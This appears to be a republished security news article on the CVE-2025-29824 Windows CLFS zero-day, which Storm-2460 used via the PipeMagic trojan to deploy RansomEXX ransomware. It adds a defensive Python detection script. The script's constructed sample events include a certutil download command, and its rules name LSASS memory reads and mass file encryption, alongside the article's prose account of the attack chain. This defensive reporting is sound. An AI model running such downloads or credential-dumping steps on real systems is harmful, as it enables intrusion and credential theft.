Global Security

PipeMagic Trojan exploits Windows vulnerability

By Admin, April 9, 2025
Windows CLFS Zero-Day Vulnerability Exploited to Deploy Ransomware
09 April 2025, Ravie Lakshmanan, Vulnerability / Ransomware

Microsoft has revealed that a now-patched security flaw affecting the Windows Common Log File System (CLFS) was exploited as a zero-day in ransomware attacks aimed at a small number of targets.

“The targets include organizations in the information technology (IT) and real estate sectors of the United States, the financial sector in Venezuela, the software sector in Spain, and the retail sector in Saudi Arabia,” the tech giant noted.

The vulnerability in question is CVE-2025-29824, a privilege escalation flaw in CLFS that can be exploited to obtain SYSTEM privileges. Redmond fixed it as part of its Patch Tuesday update for April 2025.

Microsoft is tracking the activity and the post-compromise exploitation of CVE-2025-29824 under the moniker Storm-2460; the threat actors also use a malware called PipeMagic to deliver both the exploit and the payloads.


The exact initial access vector used in the attacks is currently unknown. However, the threat actors were observed using the certutil utility to download malware from a legitimate third-party site that had previously been compromised to host the payloads.

The malware is a malicious MSBuild file that contains an encrypted payload, which is then unpacked to launch PipeMagic, a trojan that has been seen in the wild since 2022.

It is worth noting that CVE-2025-29824 is the second Windows zero-day to be delivered via PipeMagic, after CVE-2025-24983, a flaw in the Windows Win32 Kernel Subsystem that was flagged by ESET and patched by Microsoft last month.

Previously, PipeMagic was also observed in connection with Nokoyawa ransomware attacks that exploited another CLFS zero-day (CVE-2023-28252).

“In some of the other attacks we attribute to the same actor, we also observed that, prior to exploiting the CLFS elevation-of-privilege vulnerability, the victims' machines had been infected with a custom modular backdoor,” the researchers noted in April 2023.

It is important to note that Windows 11, version 24H2, is not affected by this particular exploit, because access to certain System Information Classes within NtQuerySystemInformation is limited to users holding SeDebugPrivilege, which typically only admin-like users can obtain.

“The exploit targets a vulnerability in the CLFS kernel driver,” Microsoft's threat intelligence team explained. “The memory corruption and the RtlSetAllBits API are then used to overwrite the exploit's process token with the value 0xFFFFFFFF, enabling all privileges for the process, which allows injection into SYSTEM processes.”


Successful exploitation is followed by the threat actor harvesting user credentials by dumping the memory of LSASS, and then encrypting files on the system with a random extension.
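The chain described in the paragraphs above leaves several observable traces on an endpoint: certutil fetching a file from the web, MSBuild launching a "project" from a user-writable path, a non-system process reading LSASS memory, and one process writing many files with an extension no application uses. The following Python script is an added example, not code from the original article or from Microsoft; it runs those four detection rules over constructed Sysmon-style JSON events. The event values, the LSASS opener allowlist, the known-extension set and the threshold are illustrative assumptions, not a vendor baseline.

```python
"""Detection rules for the activity chain described above, run over constructed
Sysmon-style events (EventID 1 = process create, 10 = process access,
11 = file create). Added example; the events, allowlist, extension set and
thresholds are illustrative assumptions, not Microsoft's or the article's."""
import json
import re
from collections import Counter
from pathlib import PureWindowsPath

# Constructed sample telemetry, one JSON object per line (NOT real events).
SAMPLE_EVENTS = r"""
{"EventID": 1, "ProcessId": 4100, "Image": "C:\\Windows\\System32\\certutil.exe", "CommandLine": "certutil.exe -urlcache -split -f https://example.invalid/files/update.bin C:\\Users\\Public\\update.bin"}
{"EventID": 1, "ProcessId": 4212, "Image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe", "CommandLine": "MSBuild.exe C:\\Users\\Public\\update.bin"}
{"EventID": 1, "ProcessId": 4220, "Image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe", "CommandLine": "MSBuild.exe C:\\src\\app\\app.csproj /t:Build"}
{"EventID": 10, "SourceProcessId": 4300, "SourceImage": "C:\\Users\\Public\\svc.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1010"}
{"EventID": 10, "SourceProcessId": 612, "SourceImage": "C:\\Windows\\System32\\csrss.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1010"}
{"EventID": 11, "ProcessId": 4300, "Image": "C:\\Users\\Public\\svc.exe", "TargetFilename": "C:\\Users\\alice\\Documents\\q1.xlsx.k7x2pq"}
{"EventID": 11, "ProcessId": 4300, "Image": "C:\\Users\\Public\\svc.exe", "TargetFilename": "C:\\Users\\alice\\Documents\\q2.xlsx.k7x2pq"}
{"EventID": 11, "ProcessId": 4300, "Image": "C:\\Users\\Public\\svc.exe", "TargetFilename": "C:\\Users\\alice\\Documents\\plan.docx.k7x2pq"}
{"EventID": 11, "ProcessId": 4300, "Image": "C:\\Users\\Public\\svc.exe", "TargetFilename": "C:\\Users\\alice\\Documents\\budget.pdf.k7x2pq"}
{"EventID": 11, "ProcessId": 4300, "Image": "C:\\Users\\Public\\svc.exe", "TargetFilename": "C:\\Users\\alice\\Pictures\\img1.jpg.k7x2pq"}
{"EventID": 11, "ProcessId": 4300, "Image": "C:\\Users\\Public\\svc.exe", "TargetFilename": "C:\\Users\\alice\\Pictures\\img2.jpg.k7x2pq"}
{"EventID": 11, "ProcessId": 4300, "Image": "C:\\Users\\Public\\svc.exe", "TargetFilename": "C:\\Users\\alice\\Documents\\notes.docx"}
{"EventID": 11, "ProcessId": 5000, "Image": "C:\\Windows\\explorer.exe", "TargetFilename": "C:\\Users\\alice\\Downloads\\photo.k7x2pq"}
"""

CERTUTIL_DOWNLOAD = re.compile(r"-urlcache\b", re.IGNORECASE)   # certutil's URL-fetch switch
URL = re.compile(r"https?://\S+", re.IGNORECASE)
# Hypothetical heuristic: MSBuild should not be building "projects" out of these directories.
USER_WRITABLE = re.compile(r"\\(Users\\Public|AppData\\Local\\Temp|Windows\\Temp)\\", re.IGNORECASE)
PROCESS_VM_READ = 0x0010                      # access right needed to read another process's memory
LSASS_ALLOWLIST = {"csrss.exe", "wininit.exe"}  # constructed baseline of legitimate LSASS openers
KNOWN_EXTENSIONS = {"docx", "xlsx", "pdf", "txt", "jpg", "png", "exe", "dll"}  # constructed
MASS_CREATE_THRESHOLD = 5                     # illustrative; tune per environment


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def parse_events(text: str) -> list:
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def check_certutil(ev: dict):
    """Flag certutil being used as a downloader (the delivery step in the article)."""
    if ev.get("EventID") != 1 or basename(ev["Image"]) != "certutil.exe":
        return None
    cmd = ev.get("CommandLine", "")
    if CERTUTIL_DOWNLOAD.search(cmd):
        url = URL.search(cmd)
        return f"certutil download: pid {ev['ProcessId']} fetched {url.group(0) if url else '<no url>'}"
    return None


def check_msbuild(ev: dict):
    """Flag MSBuild launched against a file in a user-writable staging directory."""
    if ev.get("EventID") != 1 or basename(ev["Image"]) != "msbuild.exe":
        return None
    if USER_WRITABLE.search(ev.get("CommandLine", "")):
        return f"MSBuild from user-writable path: pid {ev['ProcessId']}: {ev['CommandLine']}"
    return None


def check_lsass_access(ev: dict):
    """Flag a non-allowlisted process opening lsass.exe with memory-read rights."""
    if ev.get("EventID") != 10 or basename(ev["TargetImage"]) != "lsass.exe":
        return None
    source = basename(ev["SourceImage"])
    granted = int(ev["GrantedAccess"], 16)
    if granted & PROCESS_VM_READ and source not in LSASS_ALLOWLIST:
        return f"LSASS read: {source} (pid {ev['SourceProcessId']}) granted {ev['GrantedAccess']}"
    return None


def check_mass_create(events: list) -> list:
    """Flag one process writing many files that share an unrecognised extension."""
    counts = Counter()
    for ev in events:
        if ev.get("EventID") != 11:
            continue
        ext = PureWindowsPath(ev["TargetFilename"]).suffix.lstrip(".").lower()
        if ext and ext not in KNOWN_EXTENSIONS:
            counts[(ev["ProcessId"], ext)] += 1
    return [f"mass file creation: pid {pid} wrote {n} files with extension .{ext}"
            for (pid, ext), n in sorted(counts.items()) if n >= MASS_CREATE_THRESHOLD]


def triage(text: str) -> list:
    """Run every rule over the event stream and return the findings in event order."""
    events = parse_events(text)
    findings = []
    for ev in events:
        for check in (check_certutil, check_msbuild, check_lsass_access):
            hit = check(ev)
            if hit:
                findings.append(hit)
    findings.extend(check_mass_create(events))
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

Run against the constructed stream, the script reports the certutil fetch, the MSBuild launch from `C:\Users\Public`, the `svc.exe` read of LSASS, and six files written with the `.k7x2pq` extension, while the legitimate MSBuild build and the allowlisted csrss.exe access stay silent. The per-process extension counter is the only rule that needs the whole stream; the other three are stateless and could run inline on a live feed.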

Microsoft said the ransomware belongs to the RansomEXX family.

“Ransomware threat actors value post-compromise elevation-of-privilege exploits because these can allow them to escalate initial access, including that obtained from commodity malware distributors, into privileged access,” Microsoft said. “They then use that privileged access for widespread deployment and detonation of ransomware within an environment.”
